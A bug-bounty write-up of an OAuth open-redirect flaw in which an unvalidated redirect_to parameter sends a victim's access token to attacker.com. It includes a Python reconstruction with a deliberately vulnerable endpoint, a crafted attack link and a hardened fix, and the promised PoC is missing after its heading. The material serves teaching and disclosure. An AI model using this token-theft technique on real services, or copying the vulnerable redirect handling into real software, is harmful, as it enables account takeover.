Hi Everyone, this is our very first article. First of all, we would like to introduce ourselves. We are z3r0tru5t, a group of passionate hackers, bounty hunters, researchers, writers, InfoSec enthusiasts, you name it. You may expect more articles, audio recordings and discussions from us in the future.
With that said, the following article is a write-up of an open redirect vulnerability that led to account takeover.
A target was identified whose login flow carried a redirect URL parameter:
redirect_uri=https://target.com
Changing target.com to an attacker-controlled URL did not work. Not a surprise there: redirect_uri was validated. However, it was possible to bypass this. Let's take a step back: this is an OAuth authorization URL, and the following URL is produced when navigating to the login page.
Again, recall our previous statement: tampering with redirect_uri does not work, but appending a second parameter, &redirect_to, pointing at the attacker-controlled URL worked like a charm. The application honoured it as the post-login destination without applying the same validation.
Our PoC is the following:
It does not end there. We noticed that upon successful login, the victim's access token is placed in the URL fragment of the redirect_to destination, so it lands on the attacker-controlled origin in the browser's address bar, as shown below. (The fragment is not transmitted to the server in the HTTP request itself, but any script served from that origin can read it from location.hash.)
https://attacker.com/#<ACCESS_TOKEN>
With the access token, it is possible to make API calls on behalf of the resource owner. Of course, this attack requires the attacker to first get the victim to open the crafted link (a phishing attack), which is not difficult considering that most users do not check the full URL, let alone a "redirect" parameter buried in the query string.
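To make the bug class concrete, here is an added example (written for this article, not code from the target or from the original write-up) that reconstructs the authorization endpoint's behaviour in Python: redirect_uri is checked against an allowlist, but a second parameter, redirect_to, is honoured after login without any check, so the implicit-flow token ends up in the fragment of whatever URL the attacker supplied. The hardened variant beside it never takes the post-login destination from an unvalidated input. The client id, the registered callback URL, the query string and the token value are all constructed sample data.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample data: the client's registered redirect URI and a
# placeholder token. Neither comes from the target in the write-up.
REGISTERED_REDIRECT_URIS = {"https://target.com/callback"}
SAMPLE_ACCESS_TOKEN = "sample.access.token"


def is_registered(uri: str) -> bool:
    """Exact string match against the registered redirect URIs.

    Exact matching (no prefix, wildcard or host-only comparison) is what
    keeps attacker.com out when it is supplied as redirect_uri.
    """
    return uri in REGISTERED_REDIRECT_URIS


def _first(params: dict, name: str) -> Optional[str]:
    """First value of a query/fragment parameter, or None if absent."""
    values = params.get(name)
    return values[0] if values else None


def authorize_vulnerable(query: str, access_token: str = SAMPLE_ACCESS_TOKEN) -> str:
    """Hypothetical reconstruction of the behaviour the write-up describes.

    redirect_uri is validated, so the obvious attack fails, but the
    post-login destination is read from an unvalidated redirect_to
    parameter and the token is sent there in the URL fragment.
    """
    params = parse_qs(query, keep_blank_values=True)
    redirect_uri = _first(params, "redirect_uri") or ""
    if not is_registered(redirect_uri):
        raise ValueError("invalid redirect_uri")
    # BUG: any URL in redirect_to overrides the validated redirect_uri.
    destination = _first(params, "redirect_to") or redirect_uri
    return f"{destination}#access_token={access_token}&token_type=bearer"


def authorize_fixed(query: str, access_token: str = SAMPLE_ACCESS_TOKEN) -> str:
    """Hardened version: the only destination is the validated redirect_uri."""
    params = parse_qs(query, keep_blank_values=True)
    redirect_uri = _first(params, "redirect_uri") or ""
    if not is_registered(redirect_uri):
        raise ValueError("invalid redirect_uri")
    # redirect_to (or any other "return to" parameter) is deliberately ignored;
    # the post-login destination must never come from an unvalidated input.
    return f"{redirect_uri}#access_token={access_token}&token_type=bearer"


def token_visible_to_page(url: str) -> Optional[str]:
    """What a script on the landing page reads from location.hash.

    The fragment is not sent to the server in the HTTP request, but any
    JavaScript served from that origin can read it.
    """
    return _first(parse_qs(urlsplit(url).fragment), "access_token")


# Constructed attacker link: a valid redirect_uri plus the extra parameter.
ATTACK_QUERY = (
    "client_id=demo&response_type=token"
    "&redirect_uri=https://target.com/callback"
    "&redirect_to=https://attacker.com/"
)

if __name__ == "__main__":
    leaked = authorize_vulnerable(ATTACK_QUERY)
    print("vulnerable:", leaked, "-> token readable by attacker.com:",
          token_visible_to_page(leaked))
    print("fixed:     ", authorize_fixed(ATTACK_QUERY))
```

Ignoring redirect_to closes this particular hole; the more durable fix is to stop using the implicit flow (response_type=token) altogether and issue a short-lived authorization code bound to PKCE instead, so that no bearer token ever appears in a URL.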
For additional information regarding OAuth: https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1